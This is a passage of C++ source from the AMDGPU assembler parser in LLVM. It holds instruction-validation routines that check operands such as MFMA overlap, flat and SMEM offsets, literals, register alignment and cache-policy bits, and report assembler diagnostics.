Error(getRegLoc(Reg, Operands),
"source operand must be either a VGPR or an inline constant");
return false;
}
return true;
}
// For MAI (MFMA) instructions wider than 128 bits, src2 must either
// equal the destination register exactly or not overlap it at all;
// partial overlap is invalid.
bool AMDGPUAsmParser::validateMFMA(const MCInst &Inst,
                                   const OperandVector &Operands) {
  const unsigned Opc = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opc);

  if ((Desc.TSFlags & SIInstrFlags::IsMAI) == 0)
    return true;

  const int Src2Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src2);
  if (Src2Idx == -1)
    return true;

  const MCOperand &Src2 = Inst.getOperand(Src2Idx);
  if (!Src2.isReg())
    return true;

  MCRegister Src2Reg = Src2.getReg();
  MCRegister DstReg = Inst.getOperand(0).getReg();
  // Exact equality (accumulate in place) is allowed.
  if (Src2Reg == DstReg)
    return true;

  const MCRegisterInfo *TRI = getContext().getRegisterInfo();
  // Narrow (<=128-bit) destinations are exempt from the overlap rule.
  if (TRI->getRegClass(Desc.OpInfo[0].RegClass).getSizeInBits() <= 128)
    return true;

  if (TRI->regsOverlap(Src2Reg, DstReg)) {
    Error(getRegLoc(mc2PseudoReg(Src2Reg), Operands),
          "source 2 operand must not partially overlap with dst");
    return false;
  }

  return true;
}
// v_div_scale_f32/f64 do not support the ABS source modifier on any
// source operand. Returns false when any src*_modifiers has ABS set.
bool AMDGPUAsmParser::validateDivScale(const MCInst &Inst) {
  switch (Inst.getOpcode()) {
  default:
    return true;
  case V_DIV_SCALE_F32_gfx6_gfx7:
  case V_DIV_SCALE_F32_vi:
  case V_DIV_SCALE_F32_gfx10:
  case V_DIV_SCALE_F64_gfx6_gfx7:
  case V_DIV_SCALE_F64_vi:
  case V_DIV_SCALE_F64_gfx10:
    break;
  }

  // TODO: Check that src0 = src1 or src2.

  // Check all three sources. (Fixed: the list previously named
  // src2_modifiers twice and omitted src1_modifiers, so an ABS
  // modifier on src1 was silently accepted.)
  for (auto Name : {AMDGPU::OpName::src0_modifiers,
                    AMDGPU::OpName::src1_modifiers,
                    AMDGPU::OpName::src2_modifiers}) {
    if (Inst.getOperand(AMDGPU::getNamedOperandIdx(Inst.getOpcode(), Name))
            .getImm() &
        SISrcMods::ABS) {
      return false;
    }
  }

  return true;
}
bool AMDGPUAsmParser::validateMIMGD16(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
return true;
int D16Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::d16);
if (D16Idx >= 0 && Inst.getOperand(D16Idx).getImm()) {
if (isCI() || isSI())
return false;
}
return true;
}
bool AMDGPUAsmParser::validateMIMGDim(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
return true;
int DimIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dim);
if (DimIdx < 0)
return true;
long Imm = Inst.getOperand(DimIdx).getImm();
if (Imm < 0 || Imm >= 8)
return false;
return true;
}
// Returns true if Opcode is one of the "reversed-operand" VALU forms
// (v_subrev*, v_subbrev*, v_*rev shifts, packed rev shifts) in any of its
// per-subtarget encodings. Used by validateLdsDirect: these instructions
// cannot take lds_direct as a source.
static bool IsRevOpcode(const unsigned Opcode)
{
  switch (Opcode) {
  // Reversed floating-point subtract.
  case AMDGPU::V_SUBREV_F32_e32:
  case AMDGPU::V_SUBREV_F32_e64:
  case AMDGPU::V_SUBREV_F32_e32_gfx10:
  case AMDGPU::V_SUBREV_F32_e32_gfx6_gfx7:
  case AMDGPU::V_SUBREV_F32_e32_vi:
  case AMDGPU::V_SUBREV_F32_e64_gfx10:
  case AMDGPU::V_SUBREV_F32_e64_gfx6_gfx7:
  case AMDGPU::V_SUBREV_F32_e64_vi:

  // Reversed integer subtract (with and without carry).
  case AMDGPU::V_SUBREV_CO_U32_e32:
  case AMDGPU::V_SUBREV_CO_U32_e64:
  case AMDGPU::V_SUBREV_I32_e32_gfx6_gfx7:
  case AMDGPU::V_SUBREV_I32_e64_gfx6_gfx7:

  case AMDGPU::V_SUBBREV_U32_e32:
  case AMDGPU::V_SUBBREV_U32_e64:
  case AMDGPU::V_SUBBREV_U32_e32_gfx6_gfx7:
  case AMDGPU::V_SUBBREV_U32_e32_vi:
  case AMDGPU::V_SUBBREV_U32_e64_gfx6_gfx7:
  case AMDGPU::V_SUBBREV_U32_e64_vi:

  case AMDGPU::V_SUBREV_U32_e32:
  case AMDGPU::V_SUBREV_U32_e64:
  case AMDGPU::V_SUBREV_U32_e32_gfx9:
  case AMDGPU::V_SUBREV_U32_e32_vi:
  case AMDGPU::V_SUBREV_U32_e64_gfx9:
  case AMDGPU::V_SUBREV_U32_e64_vi:

  case AMDGPU::V_SUBREV_F16_e32:
  case AMDGPU::V_SUBREV_F16_e64:
  case AMDGPU::V_SUBREV_F16_e32_gfx10:
  case AMDGPU::V_SUBREV_F16_e32_vi:
  case AMDGPU::V_SUBREV_F16_e64_gfx10:
  case AMDGPU::V_SUBREV_F16_e64_vi:

  case AMDGPU::V_SUBREV_U16_e32:
  case AMDGPU::V_SUBREV_U16_e64:
  case AMDGPU::V_SUBREV_U16_e32_vi:
  case AMDGPU::V_SUBREV_U16_e64_vi:

  case AMDGPU::V_SUBREV_CO_U32_e32_gfx9:
  case AMDGPU::V_SUBREV_CO_U32_e64_gfx10:
  case AMDGPU::V_SUBREV_CO_U32_e64_gfx9:

  case AMDGPU::V_SUBBREV_CO_U32_e32_gfx9:
  case AMDGPU::V_SUBBREV_CO_U32_e64_gfx9:

  case AMDGPU::V_SUBREV_NC_U32_e32_gfx10:
  case AMDGPU::V_SUBREV_NC_U32_e64_gfx10:

  case AMDGPU::V_SUBREV_CO_CI_U32_e32_gfx10:
  case AMDGPU::V_SUBREV_CO_CI_U32_e64_gfx10:

  // Reversed 32-bit shifts.
  case AMDGPU::V_LSHRREV_B32_e32:
  case AMDGPU::V_LSHRREV_B32_e64:
  case AMDGPU::V_LSHRREV_B32_e32_gfx6_gfx7:
  case AMDGPU::V_LSHRREV_B32_e64_gfx6_gfx7:
  case AMDGPU::V_LSHRREV_B32_e32_vi:
  case AMDGPU::V_LSHRREV_B32_e64_vi:
  case AMDGPU::V_LSHRREV_B32_e32_gfx10:
  case AMDGPU::V_LSHRREV_B32_e64_gfx10:

  case AMDGPU::V_ASHRREV_I32_e32:
  case AMDGPU::V_ASHRREV_I32_e64:
  case AMDGPU::V_ASHRREV_I32_e32_gfx10:
  case AMDGPU::V_ASHRREV_I32_e32_gfx6_gfx7:
  case AMDGPU::V_ASHRREV_I32_e32_vi:
  case AMDGPU::V_ASHRREV_I32_e64_gfx10:
  case AMDGPU::V_ASHRREV_I32_e64_gfx6_gfx7:
  case AMDGPU::V_ASHRREV_I32_e64_vi:

  case AMDGPU::V_LSHLREV_B32_e32:
  case AMDGPU::V_LSHLREV_B32_e64:
  case AMDGPU::V_LSHLREV_B32_e32_gfx10:
  case AMDGPU::V_LSHLREV_B32_e32_gfx6_gfx7:
  case AMDGPU::V_LSHLREV_B32_e32_vi:
  case AMDGPU::V_LSHLREV_B32_e64_gfx10:
  case AMDGPU::V_LSHLREV_B32_e64_gfx6_gfx7:
  case AMDGPU::V_LSHLREV_B32_e64_vi:

  // Reversed 16-bit shifts.
  case AMDGPU::V_LSHLREV_B16_e32:
  case AMDGPU::V_LSHLREV_B16_e64:
  case AMDGPU::V_LSHLREV_B16_e32_vi:
  case AMDGPU::V_LSHLREV_B16_e64_vi:
  case AMDGPU::V_LSHLREV_B16_gfx10:

  case AMDGPU::V_LSHRREV_B16_e32:
  case AMDGPU::V_LSHRREV_B16_e64:
  case AMDGPU::V_LSHRREV_B16_e32_vi:
  case AMDGPU::V_LSHRREV_B16_e64_vi:
  case AMDGPU::V_LSHRREV_B16_gfx10:

  case AMDGPU::V_ASHRREV_I16_e32:
  case AMDGPU::V_ASHRREV_I16_e64:
  case AMDGPU::V_ASHRREV_I16_e32_vi:
  case AMDGPU::V_ASHRREV_I16_e64_vi:
  case AMDGPU::V_ASHRREV_I16_gfx10:

  // Reversed 64-bit shifts.
  case AMDGPU::V_LSHLREV_B64_e64:
  case AMDGPU::V_LSHLREV_B64_gfx10:
  case AMDGPU::V_LSHLREV_B64_vi:

  case AMDGPU::V_LSHRREV_B64_e64:
  case AMDGPU::V_LSHRREV_B64_gfx10:
  case AMDGPU::V_LSHRREV_B64_vi:

  case AMDGPU::V_ASHRREV_I64_e64:
  case AMDGPU::V_ASHRREV_I64_gfx10:
  case AMDGPU::V_ASHRREV_I64_vi:

  // Reversed packed 16-bit shifts.
  case AMDGPU::V_PK_LSHLREV_B16:
  case AMDGPU::V_PK_LSHLREV_B16_gfx10:
  case AMDGPU::V_PK_LSHLREV_B16_vi:

  case AMDGPU::V_PK_LSHRREV_B16:
  case AMDGPU::V_PK_LSHRREV_B16_gfx10:
  case AMDGPU::V_PK_LSHRREV_B16_vi:
  case AMDGPU::V_PK_ASHRREV_I16:
  case AMDGPU::V_PK_ASHRREV_I16_gfx10:
  case AMDGPU::V_PK_ASHRREV_I16_vi:
    return true;
  default:
    return false;
  }
}
// Check uses of the lds_direct pseudo register. Returns an error message
// when the use is invalid, or None when the instruction is acceptable.
Optional<StringRef> AMDGPUAsmParser::validateLdsDirect(const MCInst &Inst) {
  using namespace SIInstrFlags;
  const unsigned Opcode = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opcode);

  // lds_direct register is defined so that it can be used
  // with 9-bit operands only. Ignore encodings which do not accept these.
  const auto Enc = VOP1 | VOP2 | VOP3 | VOPC | VOP3P | SIInstrFlags::SDWA;
  if ((Desc.TSFlags & Enc) == 0)
    return None;

  for (auto SrcName : {OpName::src0, OpName::src1, OpName::src2}) {
    auto SrcIdx = getNamedOperandIdx(Opcode, SrcName);
    // Source operands are contiguous; the first missing one ends the scan.
    if (SrcIdx == -1)
      break;
    const auto &Src = Inst.getOperand(SrcIdx);
    if (Src.isReg() && Src.getReg() == LDS_DIRECT) {
      if (isGFX90A())
        return StringRef("lds_direct is not supported on this GPU");
      // Reversed opcodes swap src0/src1, and SDWA has its own operand
      // encoding; neither can address lds_direct.
      if (IsRevOpcode(Opcode) || (Desc.TSFlags & SIInstrFlags::SDWA))
        return StringRef("lds_direct cannot be used with this instruction");
      if (SrcName != OpName::src0)
        return StringRef("lds_direct may be used as src0 only");
    }
  }

  return None;
}
// Return the source location of the flat-offset operand, falling back to
// the current parser location when none is present.
SMLoc AMDGPUAsmParser::getFlatOffsetLoc(const OperandVector &Operands) const {
  // Operand 0 is the mnemonic token; start scanning after it.
  for (unsigned Idx = 1, End = Operands.size(); Idx != End; ++Idx) {
    AMDGPUOperand &Cand = (AMDGPUOperand &)*Operands[Idx];
    if (Cand.isFlatOffset())
      return Cand.getStartLoc();
  }
  return getLoc();
}
// Validate the immediate offset of a FLAT-family instruction against the
// width and signedness supported by the target.
bool AMDGPUAsmParser::validateFlatOffset(const MCInst &Inst,
                                         const OperandVector &Operands) {
  uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
  if ((TSFlags & SIInstrFlags::FLAT) == 0)
    return true;

  auto Opcode = Inst.getOpcode();
  auto OpNum = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::offset);
  assert(OpNum != -1);

  const auto &Op = Inst.getOperand(OpNum);
  // Targets without flat-offset support require the modifier to be zero.
  if (!hasFlatOffsets() && Op.getImm() != 0) {
    Error(getFlatOffsetLoc(Operands),
          "flat offset modifier is not supported on this GPU");
    return false;
  }

  // For FLAT segment the offset must be positive;
  // MSB is ignored and forced to zero.
  if (TSFlags & (SIInstrFlags::FlatGlobal | SIInstrFlags::FlatScratch)) {
    // Global/scratch variants take a signed offset of target-dependent width.
    unsigned OffsetSize = AMDGPU::getNumFlatOffsetBits(getSTI(), true);
    if (!isIntN(OffsetSize, Op.getImm())) {
      Error(getFlatOffsetLoc(Operands),
            Twine("expected a ") + Twine(OffsetSize) + "-bit signed offset");
      return false;
    }
  } else {
    // Plain FLAT takes an unsigned offset.
    unsigned OffsetSize = AMDGPU::getNumFlatOffsetBits(getSTI(), false);
    if (!isUIntN(OffsetSize, Op.getImm())) {
      Error(getFlatOffsetLoc(Operands),
            Twine("expected a ") + Twine(OffsetSize) + "-bit unsigned offset");
      return false;
    }
  }
  return true;
}
// Locate the SMEM offset operand for diagnostics; fall back to the current
// parser location if the instruction has none.
SMLoc AMDGPUAsmParser::getSMEMOffsetLoc(const OperandVector &Operands) const {
  // Start with second operand because SMEM Offset cannot be dst or src0.
  for (unsigned Idx = 2, End = Operands.size(); Idx != End; ++Idx) {
    AMDGPUOperand &Cand = (AMDGPUOperand &)*Operands[Idx];
    if (Cand.isSMEMOffset())
      return Cand.getStartLoc();
  }
  return getLoc();
}
// Validate the immediate offset of an SMEM/SMRD instruction against the
// encodings the target accepts. SI/CI are skipped here.
bool AMDGPUAsmParser::validateSMEMOffset(const MCInst &Inst,
                                         const OperandVector &Operands) {
  if (isCI() || isSI())
    return true;

  uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
  if ((TSFlags & SIInstrFlags::SMRD) == 0)
    return true;

  auto Opcode = Inst.getOpcode();
  auto OpNum = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::offset);
  if (OpNum == -1)
    return true;

  const auto &Op = Inst.getOperand(OpNum);
  // Not a plain immediate (e.g. an expression): nothing to range-check here.
  if (!Op.isImm())
    return true;

  uint64_t Offset = Op.getImm();
  bool IsBuffer = AMDGPU::getSMEMIsBuffer(Opcode);
  // Accept the offset if either legal encoding (unsigned or signed) fits.
  if (AMDGPU::isLegalSMRDEncodedUnsignedOffset(getSTI(), Offset) ||
      AMDGPU::isLegalSMRDEncodedSignedOffset(getSTI(), Offset, IsBuffer))
    return true;

  Error(getSMEMOffsetLoc(Operands),
        (isVI() || IsBuffer) ? "expected a 20-bit unsigned offset" :
                               "expected a 21-bit signed offset");
  return false;
}
// SOP2/SOPC instructions can encode at most one 32-bit literal, shared by
// both sources. Count distinct literal values plus expression operands and
// return false when more than one would be required.
bool AMDGPUAsmParser::validateSOPLiteral(const MCInst &Inst) const {
  unsigned Opcode = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opcode);
  if (!(Desc.TSFlags & (SIInstrFlags::SOP2 | SIInstrFlags::SOPC)))
    return true;

  const int Src0Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src0);
  const int Src1Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src1);

  const int OpIndices[] = { Src0Idx, Src1Idx };

  unsigned NumExprs = 0;
  unsigned NumLiterals = 0;
  // Only meaningful while NumLiterals > 0; guarded below before first read.
  uint32_t LiteralValue;

  for (int OpIdx : OpIndices) {
    if (OpIdx == -1) break;

    const MCOperand &MO = Inst.getOperand(OpIdx);
    // Exclude special imm operands (like that used by s_set_gpr_idx_on)
    if (AMDGPU::isSISrcOperand(Desc, OpIdx)) {
      if (MO.isImm() && !isInlineConstant(Inst, OpIdx)) {
        uint32_t Value = static_cast<uint32_t>(MO.getImm());
        // Identical literals share one encoding slot; count distinct values.
        if (NumLiterals == 0 || LiteralValue != Value) {
          LiteralValue = Value;
          ++NumLiterals;
        }
      } else if (MO.isExpr()) {
        ++NumExprs;
      }
    }
  }

  return NumLiterals + NumExprs <= 1;
}
// v_permlane16/v_permlanex16 only accept the two low op_sel bits; any
// higher bit set makes the operand invalid.
bool AMDGPUAsmParser::validateOpSel(const MCInst &Inst) {
  const unsigned Opc = Inst.getOpcode();
  if (Opc != AMDGPU::V_PERMLANE16_B32_gfx10 &&
      Opc != AMDGPU::V_PERMLANEX16_B32_gfx10)
    return true;

  const int OpSelIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::op_sel);
  const unsigned OpSel = Inst.getOperand(OpSelIdx).getImm();
  return (OpSel & ~3u) == 0;
}
// Validate the dpp_ctrl operand: controls that are illegal for 64-bit
// operands are rejected when src0 is a 64-bit (or wider) register.
bool AMDGPUAsmParser::validateDPP(const MCInst &Inst,
                                  const OperandVector &Operands) {
  const unsigned Opc = Inst.getOpcode();
  int DppCtrlIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dpp_ctrl);
  if (DppCtrlIdx < 0)
    return true;

  unsigned DppCtrl = Inst.getOperand(DppCtrlIdx).getImm();

  if (!AMDGPU::isLegal64BitDPPControl(DppCtrl)) {
    // DPP64 is supported for row_newbcast only.
    int Src0Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0);
    // A sub1 subregister existing implies src0 is at least 64 bits wide.
    if (Src0Idx >= 0 &&
        getMRI()->getSubReg(Inst.getOperand(Src0Idx).getReg(), AMDGPU::sub1)) {
      SMLoc S = getImmLoc(AMDGPUOperand::ImmTyDppCtrl, Operands);
      Error(S, "64 bit dpp only supports row_newbcast");
      return false;
    }
  }

  return true;
}
// Check if VCC register matches wavefront size:
// wave64 expects the full VCC pair, wave32 expects VCC_LO.
bool AMDGPUAsmParser::validateVccOperand(unsigned Reg) const {
  auto FB = getFeatureBits();
  const bool Wave64 = FB[AMDGPU::FeatureWavefrontSize64];
  const bool Wave32 = FB[AMDGPU::FeatureWavefrontSize32];
  return (Wave64 && Reg == AMDGPU::VCC) ||
         (Wave32 && Reg == AMDGPU::VCC_LO);
}
// One unique literal can be used. VOP3 literal is only allowed in GFX10+
bool AMDGPUAsmParser::validateVOPLiteral(const MCInst &Inst,
                                         const OperandVector &Operands) {
  unsigned Opcode = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opcode);
  const int ImmIdx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::imm);
  // Only VOP3/VOP3P encodings and instructions with an explicit imm operand
  // are subject to this check.
  if (!(Desc.TSFlags & (SIInstrFlags::VOP3 | SIInstrFlags::VOP3P)) &&
      ImmIdx == -1)
    return true;

  const int Src0Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src0);
  const int Src1Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src1);
  const int Src2Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src2);

  const int OpIndices[] = {Src0Idx, Src1Idx, Src2Idx, ImmIdx};

  unsigned NumExprs = 0;
  unsigned NumLiterals = 0;
  // Only meaningful while NumLiterals > 0; guarded below before first read.
  uint32_t LiteralValue;

  for (int OpIdx : OpIndices) {
    if (OpIdx == -1)
      continue;

    const MCOperand &MO = Inst.getOperand(OpIdx);
    if (!MO.isImm() && !MO.isExpr())
      continue;
    if (!AMDGPU::isSISrcOperand(Desc, OpIdx))
      continue;

    // Targets with FeatureMFMAInlineLiteralBug cannot encode inline
    // constants in the src2 slot of MAI instructions.
    if (OpIdx == Src2Idx && (Desc.TSFlags & SIInstrFlags::IsMAI) &&
        getFeatureBits()[AMDGPU::FeatureMFMAInlineLiteralBug]) {
      Error(getConstLoc(Operands),
            "inline constants are not allowed for this operand");
      return false;
    }

    if (MO.isImm() && !isInlineConstant(Inst, OpIdx)) {
      uint32_t Value = static_cast<uint32_t>(MO.getImm());
      // Identical literals share one encoding slot; count distinct values.
      if (NumLiterals == 0 || LiteralValue != Value) {
        LiteralValue = Value;
        ++NumLiterals;
      }
    } else if (MO.isExpr()) {
      ++NumExprs;
    }
  }
  NumLiterals += NumExprs;

  if (!NumLiterals)
    return true;

  if (ImmIdx == -1 && !getFeatureBits()[AMDGPU::FeatureVOP3Literal]) {
    Error(getLitLoc(Operands), "literal operands are not supported");
    return false;
  }

  if (NumLiterals > 1) {
    Error(getLitLoc(Operands), "only one literal operand is allowed");
    return false;
  }

  return true;
}
// Classify a named operand: -1 when absent or not a register,
// 0 when it is a VGPR, 1 when it is an AGPR.
static int IsAGPROperand(const MCInst &Inst, uint16_t NameIdx,
                         const MCRegisterInfo *MRI) {
  const int OpIdx = AMDGPU::getNamedOperandIdx(Inst.getOpcode(), NameIdx);
  if (OpIdx < 0)
    return -1;

  const MCOperand &Op = Inst.getOperand(OpIdx);
  if (!Op.isReg())
    return -1;

  // For register tuples, classify by the first subregister.
  const unsigned Sub = MRI->getSubReg(Op.getReg(), AMDGPU::sub0);
  const unsigned Reg = Sub ? Sub : Op.getReg();
  const MCRegisterClass &AGPR32 = MRI->getRegClass(AMDGPU::AGPR_32RegClassID);
  return AGPR32.contains(Reg) ? 1 : 0;
}
// Validate AGPR vs VGPR usage for the data/dst operands of memory
// instructions (FLAT/MUBUF/MTBUF/MIMG/DS). On gfx90a, dst and data must be
// in the same register file; on other targets AGPR operands are rejected.
bool AMDGPUAsmParser::validateAGPRLdSt(const MCInst &Inst) const {
  uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
  if ((TSFlags & (SIInstrFlags::FLAT | SIInstrFlags::MUBUF |
                  SIInstrFlags::MTBUF | SIInstrFlags::MIMG |
                  SIInstrFlags::DS)) == 0)
    return true;

  // DS instructions name their data operand data0; the others use vdata.
  uint16_t DataNameIdx = (TSFlags & SIInstrFlags::DS) ? AMDGPU::OpName::data0
                                                      : AMDGPU::OpName::vdata;

  const MCRegisterInfo *MRI = getMRI();
  int DstAreg = IsAGPROperand(Inst, AMDGPU::OpName::vdst, MRI);
  int DataAreg = IsAGPROperand(Inst, DataNameIdx, MRI);

  if ((TSFlags & SIInstrFlags::DS) && DataAreg >= 0) {
    // DS with two data operands: both must be in the same register file.
    int Data2Areg = IsAGPROperand(Inst, AMDGPU::OpName::data1, MRI);
    if (Data2Areg >= 0 && Data2Areg != DataAreg)
      return false;
  }

  auto FB = getFeatureBits();
  if (FB[AMDGPU::FeatureGFX90AInsts]) {
    // -1 means "no such operand / not a register": nothing to compare.
    if (DataAreg < 0 || DstAreg < 0)
      return true;
    return DstAreg == DataAreg;
  }

  // Other targets: neither operand may be an AGPR (classification 1).
  return DstAreg < 1 && DataAreg < 1;
}
// On gfx90a, VGPR/AGPR register tuples must start at an even register
// index (64-bit alignment). Scan every register operand and reject
// odd-aligned tuples.
bool AMDGPUAsmParser::validateVGPRAlign(const MCInst &Inst) const {
  auto FB = getFeatureBits();
  if (!FB[AMDGPU::FeatureGFX90AInsts])
    return true;

  const MCRegisterInfo *MRI = getMRI();
  const MCRegisterClass &VGPR32 = MRI->getRegClass(AMDGPU::VGPR_32RegClassID);
  const MCRegisterClass &AGPR32 = MRI->getRegClass(AMDGPU::AGPR_32RegClassID);
  for (unsigned I = 0, E = Inst.getNumOperands(); I != E; ++I) {
    const MCOperand &Op = Inst.getOperand(I);
    if (!Op.isReg())
      continue;

    // No sub0 subregister means this is a single register, not a tuple.
    unsigned Sub = MRI->getSubReg(Op.getReg(), AMDGPU::sub0);
    if (!Sub)
      continue;

    if (VGPR32.contains(Sub) && ((Sub - AMDGPU::VGPR0) & 1))
      return false;
    if (AGPR32.contains(Sub) && ((Sub - AMDGPU::AGPR0) & 1))
      return false;
  }

  return true;
}
// gfx90a has an undocumented limitation:
// DS_GWS opcodes must use even aligned registers.
bool AMDGPUAsmParser::validateGWS(const MCInst &Inst,
                                  const OperandVector &Operands) {
  if (!getFeatureBits()[AMDGPU::FeatureGFX90AInsts])
    return true;

  int Opc = Inst.getOpcode();
  if (Opc != AMDGPU::DS_GWS_INIT_vi && Opc != AMDGPU::DS_GWS_BARRIER_vi &&
      Opc != AMDGPU::DS_GWS_SEMA_BR_vi)
    return true;

  const MCRegisterInfo *MRI = getMRI();
  const MCRegisterClass &VGPR32 = MRI->getRegClass(AMDGPU::VGPR_32RegClassID);
  int Data0Pos =
      AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::data0);
  assert(Data0Pos != -1);
  auto Reg = Inst.getOperand(Data0Pos).getReg();
  // Index of the register within its file (VGPR or AGPR).
  auto RegIdx = Reg - (VGPR32.contains(Reg) ? AMDGPU::VGPR0 : AMDGPU::AGPR0);
  if (RegIdx & 1) {
    SMLoc RegLoc = getRegLoc(Reg, Operands);
    Error(RegLoc, "vgpr must be even aligned");
    return false;
  }

  return true;
}
// Validate the cache-policy (cpol) bits: SMRD accepts only glc/dlc, scc is
// rejected on gfx90a, and atomics must use glc if and only if they return
// a value.
bool AMDGPUAsmParser::validateCoherencyBits(const MCInst &Inst,
                                            const OperandVector &Operands,
                                            const SMLoc &IDLoc) {
  int CPolPos = AMDGPU::getNamedOperandIdx(Inst.getOpcode(),
                                           AMDGPU::OpName::cpol);
  if (CPolPos == -1)
    return true;

  unsigned CPol = Inst.getOperand(CPolPos).getImm();

  uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
  if ((TSFlags & (SIInstrFlags::SMRD)) &&
      (CPol & ~(AMDGPU::CPol::GLC | AMDGPU::CPol::DLC))) {
    Error(IDLoc, "invalid cache policy for SMRD instruction");
    return false;
  }

  if (isGFX90A() && (CPol & CPol::SCC)) {
    // Point the diagnostic at the "scc" token inside the cpol operand text.
    SMLoc S = getImmLoc(AMDGPUOperand::ImmTyCPol, Operands);
    StringRef CStr(S.getPointer());
    S = SMLoc::getFromPointer(&CStr.data()[CStr.find("scc")]);
    Error(S, "scc is not supported on this GPU");
    return false;
  }

  if (!(TSFlags & (SIInstrFlags::IsAtomicNoRet | SIInstrFlags::IsAtomicRet)))
    return true;

  if (TSFlags & SIInstrFlags::IsAtomicRet) {
    // Returning atomics must set glc (except MIMG, which is exempt here).
    if (!(TSFlags & SIInstrFlags::MIMG) && !(CPol & CPol::GLC)) {
      Error(IDLoc, "instruction must use glc");
      return false;
    }
  } else {
    // Non-returning atomics must not set glc.
    if (CPol & CPol::GLC) {
      // Point the diagnostic at the "glc" token inside the cpol operand text.
      SMLoc S = getImmLoc(AMDGPUOperand::ImmTyCPol, Operands);
      StringRef CStr(S.getPointer());
      S = SMLoc::getFromPointer(&CStr.data()[CStr.find("glc")]);
      Error(S, "instruction must not use glc");
      return false;
    }
  }

  return true;
}
// Top-level semantic validation run after a successful match. Each check
// either passes or emits a diagnostic and makes this function return false.
// Note: the previous version called validateCoherencyBits twice (once in
// the middle of the chain and once at the end); the redundant duplicate
// call has been removed.
bool AMDGPUAsmParser::validateInstruction(const MCInst &Inst,
                                          const SMLoc &IDLoc,
                                          const OperandVector &Operands) {
  if (auto ErrMsg = validateLdsDirect(Inst)) {
    Error(getRegLoc(LDS_DIRECT, Operands), *ErrMsg);
    return false;
  }
  if (!validateSOPLiteral(Inst)) {
    Error(getLitLoc(Operands),
      "only one literal operand is allowed");
    return false;
  }
  if (!validateVOPLiteral(Inst, Operands)) {
    return false;
  }
  if (!validateConstantBusLimitations(Inst, Operands)) {
    return false;
  }
  if (!validateEarlyClobberLimitations(Inst, Operands)) {
    return false;
  }
  if (!validateIntClampSupported(Inst)) {
    Error(getImmLoc(AMDGPUOperand::ImmTyClampSI, Operands),
      "integer clamping is not supported on this GPU");
    return false;
  }
  if (!validateOpSel(Inst)) {
    Error(getImmLoc(AMDGPUOperand::ImmTyOpSel, Operands),
      "invalid op_sel operand");
    return false;
  }
  if (!validateDPP(Inst, Operands)) {
    return false;
  }
  // For MUBUF/MTBUF d16 is a part of opcode, so there is nothing to validate.
  if (!validateMIMGD16(Inst)) {
    Error(getImmLoc(AMDGPUOperand::ImmTyD16, Operands),
      "d16 modifier is not supported on this GPU");
    return false;
  }
  if (!validateMIMGDim(Inst)) {
    Error(IDLoc, "dim modifier is required on this GPU");
    return false;
  }
  if (!validateMIMGMSAA(Inst)) {
    Error(getImmLoc(AMDGPUOperand::ImmTyDim, Operands),
          "invalid dim; must be MSAA type");
    return false;
  }
  if (!validateMIMGDataSize(Inst)) {
    Error(IDLoc,
      "image data size does not match dmask and tfe");
    return false;
  }
  if (!validateMIMGAddrSize(Inst)) {
    Error(IDLoc,
      "image address size does not match dim and a16");
    return false;
  }
  if (!validateMIMGAtomicDMask(Inst)) {
    Error(getImmLoc(AMDGPUOperand::ImmTyDMask, Operands),
      "invalid atomic image dmask");
    return false;
  }
  if (!validateMIMGGatherDMask(Inst)) {
    Error(getImmLoc(AMDGPUOperand::ImmTyDMask, Operands),
      "invalid image_gather dmask: only one bit must be set");
    return false;
  }
  if (!validateMovrels(Inst, Operands)) {
    return false;
  }
  if (!validateFlatOffset(Inst, Operands)) {
    return false;
  }
  if (!validateSMEMOffset(Inst, Operands)) {
    return false;
  }
  if (!validateMAIAccWrite(Inst, Operands)) {
    return false;
  }
  if (!validateMFMA(Inst, Operands)) {
    return false;
  }
  if (!validateCoherencyBits(Inst, Operands, IDLoc)) {
    return false;
  }
  if (!validateAGPRLdSt(Inst)) {
    Error(IDLoc, getFeatureBits()[AMDGPU::FeatureGFX90AInsts]
    ? "invalid register class: data and dst should be all VGPR or AGPR"
    : "invalid register class: agpr loads and stores not supported on this GPU"
    );
    return false;
  }
  if (!validateVGPRAlign(Inst)) {
    Error(IDLoc,
      "invalid register class: vgpr tuples must be 64 bit aligned");
    return false;
  }
  if (!validateGWS(Inst, Operands)) {
    return false;
  }
  if (!validateDivScale(Inst)) {
    Error(IDLoc, "ABS not allowed in VOP3B instructions");
    return false;
  }

  return true;
}
static std::string AMDGPUMnemonicSpellCheck(StringRef S,
const FeatureBitset &FBS,
unsigned VariantID = 0);
static bool AMDGPUCheckMnemonic(StringRef Mnemonic,
const FeatureBitset &AvailableFeatures,
unsigned VariantID);
// Convenience overload: check the mnemonic against all assembler variants.
bool AMDGPUAsmParser::isSupportedMnemo(StringRef Mnemo,
                                       const FeatureBitset &FBS) {
